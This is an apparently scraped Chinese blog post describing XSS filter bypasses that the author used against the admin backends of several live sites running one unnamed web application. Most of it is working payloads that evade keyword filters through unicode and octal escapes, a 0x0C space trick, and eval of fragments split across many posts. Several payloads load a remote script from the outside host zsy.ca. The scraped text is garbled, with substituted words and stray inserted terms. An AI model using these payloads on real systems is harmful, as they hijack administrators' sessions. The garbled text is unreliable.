一次有趣的XSS漏洞挖掘分析（1）

时间 2019-11-26

原文原文链接

最近认识了个新朋友，每天找我搞XSS。搞了三天，感受这一套程序仍是颇有意思的。由于是过去式的文章，因此没有图。可是但愿把经验分享出来，能够帮到和我同样爱好XSS的朋友。我我的偏心富文本XSS，由于颇有趣。有趣的地方是你须要一点一点的测试都过滤了些什么，怎么过滤的。我想，这也是黑盒测试最让人着迷的地方吧

  首先，锁定了提交问题的模块，由于这块有编辑器。而后开始fuzz filter规则。一共有两个输入点：标题,内容
  我通常喜欢从内容入手，由于这块没有长度限制。一开始先一个一个测试一些能够用来XSS攻击的标签。 html

01：linux

<script><a><p><img><body><button><var><div><iframe><meta><object><marquee><isindex ><input><select>><keygen><frameset><embed><svg><math><video><audio><textarea

通过一系列测试以后，发现存活的只有<img>和<a>标签。这就比较尴尬了。这种状况下通常能用起来的，属性也就几个了onload,onerror,onmouseover,onclick和href
理清思路以后开始第二轮的测试，就是属性测试:程序员

01；数据库

<img onerror onload onmouseover src=x>

01:安全

<a href  onmouseover  onclick >

测试后发现，这几个好用的on事件都被过滤了。然而程序员为了防止插入<script>把scr给过滤了,因此href里面也不可能再写伪协议来执行XSS了。
搞到这的时候，心想搞个data URI（<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4=>求助</a>）就算了。起码FF下还会继承当前域。不过基友不肯意啊。想了想也是这是打后台，只能搞一些通杀的XSS，否则不白扯么。而后回过头来看了下标题。仍是上面的测试流程。意外的发现标题出竟然没有对img标签进行过滤，属性种只有onload没有被过滤。接着先试了下编辑器

01:ide

<img src=站内有效图片地址 onload=document.write(123)>

被拦截了。又蛋疼的测试了一下子后发现document被过滤了。好吧……转成unicode，继续绕:svg

<img src=站内有效图片地址 onload=\u0064ocument.write(123)>

这下过了，不过把页面给毁了。呵呵，人嘛总有那么几天会犯傻逼。从新注册个账号。心想此次要一次搞定，因此仍是避免单引号吧，就写了个:测试

<img src=站内有效图片地址 onload=\u0064ocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,122,115,121,46,99,97,47,51,51,62,60,47,115,99,114,105,112,116,62))>

很好，又被拦截了。测试了很长时间终于没有耐心了（这个标题有字数限制，若是不找到过滤的字符，而是整篇都转了，长度会不够）。发现Char被过滤了（一看就是把防注入和防XSS写一起了。屌丝何须难为屌丝……），不像再走这条路了。换个姿式:网站

<img src=有效图片 onload="\u0064ocument.write('&lt;sc'+'ript src=//zsy.ca/33&gt;&lt;/sc'+'ript&gt;')">

终于写好了一个没有document,没有char，没有scr的payload，再多两个字就插不进去了。写好了通用的payload后，发给了基友，过一天。他又M我说，有一个同样的站，不过搞不定。

不知道为何一套程序会有这么多变异版本。此次的状况更有趣了。内容插入的标签都被HTMLEncode了。标题处已经不能再插img标签了。心想估计是升级版吧。结果他说没事儿，我知道这个不能搞，搞不定就算了。换谁谁都怒了。继续用前面的方式，fuzz标题处容许的标签，fuzz出来4个:
<img> <div> <style> <a>
开始作属性测试，仍是上面那一套方法，发现<p onmouseover>没有问题，那上面的payload改了一改。

<p onmouseover="\u0064ocument.write('&lt;sc'+'ript src=//zsy.ca/33&gt;&lt;/sc'+'ript&gt;')">

发给他就睡觉了。结果第三天，他又搞了一个站说前面两个方法都不行。真是奇怪了。这奇葩程序究竟是谁在维护,f4ck it.此次更有趣了。标题和内容都被HTMLencode了，并且编辑器直接被去掉了。不过此次多了个功能。叫上传图片。其实搞到这儿的时候，已经很累了。不过放弃不是我性格，只能接着搞了。这是我最喜欢linux的一点，由于文件名的命名规则没有win那么矫情。搞了个图片，名称改为:

<img src=x onerror=confirm()>.png

因为是新功能。程序员没有对文件名进行htmlencode直接输出在了页面，小框框再一次弹起。舒服多了…… 不过又有新的问题了。因为是文件上传，因此咱们的payload中不能出现，"/" 我以为应该是会被认成filepath而后就被截断了。再换个姿式:

<svg onload=\u0064cument.write(String.from\u0043harCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,122,115,121,46,99,97,47,51,51,62,60,47,115,99,114,105,112,116,62))

没有scr,没有Char，没有document,没有“/”的姿式就算写好了。
到这儿还没完。还有1个呢。后面他又给我发了个变异版本。说能插进去却执行不了。拿过来网站后看了下。好家伙，此次更好玩了。以前的三个站，标题的长度限制都是100(不是客户端验证，是在定义数据库字段的时候，作了限制)。此次的长度只有35，payload后面的部分都被吃掉了。目测数据库那块儿没变，可是在PHP端，作了限制。还多了个安全宝（要不要这样？）别的还好拆。这onmouseover拆成10个20个的，让人一个一个划过去，这内心边没底啊。只能找别的payload了。此次也累了，就随便试了一下:

<img onAbort onActivate onAfterPrint onAfterUpdate onBeforeActivate onBeforeCopy onBeforeCut onBeforeDeactivate onBeforeEditFocus onBeforePaste onBeforePrint onBeforeUnload onBeforeUpdate onBegin onBlur onBounce onCellChange onChange  onClick onContextMenu onControlSelect onCopy onCut onDataAvailable onDataSetChanged onDataSetComplete onDblClick onDeactivate onDrag onDragEnd onDragLeave onDragEnter onDragOver onDragDrop onDragStart onDrop onEnd onError onErrorUpdate onFilterChange onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver onMouseUp onMouseWheel onMove onMoveEnd onMoveStart onOffline onOnline onOutOfSync onPaste onPause onPopState onProgress onPropertyChange onReadyStateChange onRedo onRepeat onReset onResize onResizeEnd onResizeStart onResume onReverse onRowsEnter onRowExit onRowDelete onRowInserted onScroll onSeek onSelect onSelectionChange

02.onSelectStart onStart onStop onStorage onSyncRestored onSubmit onTimeError onTrackChange onUndo onUnload onURLFli formaction action href xlink:href autofocus src content data from values to  style>

发完贴以后变成了:

<img onAbort="">

一时没搞明白是什么状况，随后试了一下:

<img src=x onerror=confirm()>

变成了:

01.<img src=x>

原来是在发现一个以上的空格时，会从第二个空格开始把后面内容都过虑了。这就好弄了。换空格的法儿就多了，祭出Hexeditor，把第二个空格换成0x0C:

保存后，复制payload：

<img src=x[0x0C] onerror=confirm()>

个人乖乖终于弹起来了。综合考虑，前面的那些被过滤的字符(document,scr,char,"/")，打算仍是转成8进制算了。反正拆完的内容最后还要eval一下。就有了:

01.<img onerror=a='\144\157' src=x>

02.<img onerror=a+='\143\165' src=x>

03.<img onerror=a+='\155\145' src=x>

04.<img onerror=a+='\156\164' src=x>

05.<img onerror=a+='\56\167' src=x>

06.<img onerror=a+='\162\151' src=x>

07.<img onerror=a+='\164\145' src=x>

08.<img onerror=a+='\50\47' src=x>

09.<img onerror=a+='\74\163' src=x>

10.<img onerror=a+='\143\162' src=x>

11.<img onerror=a+='\151\160' src=x>

12.<img onerror=a+='\164\40' src=x>

13.<img onerror=a+='\163\162' src=x>

14.<img onerror=a+='\143\75' src=x>

15.<img onerror=a+='\57\57' src=x>

16.<img onerror=a+='\172\163' src=x>

17.<img onerror=a+='\171\56' src=x>

18.<img onerror=a+='\143\141' src=x>

19.<img onerror=a+='\57\63\6' src=x>

20.<img onerror=a+='3\76\74' src=x>

21.<img onerror=a+='\57\163\1' src=x>

22.<img onerror=a+='43\162\15' src=x>

23.<img onerror=a+='1\160\164' src=x>

24.<img onerror=a+='\76\47\51' src=x>

25.<img onerror=eval(a) src=x>

插入的时候，倒序插入（由于帖子会按照时间顺序来呈现）。最后就算搞定了。感受是次颇有趣的经历。虽然有点长但耐心读完应该仍是有帮助的。虽然不是什么碉堡的程序，可是国内有不少家***都在用这套。因此不方便透漏是哪一套。若是你知道是哪一套，也但愿你不要说出来.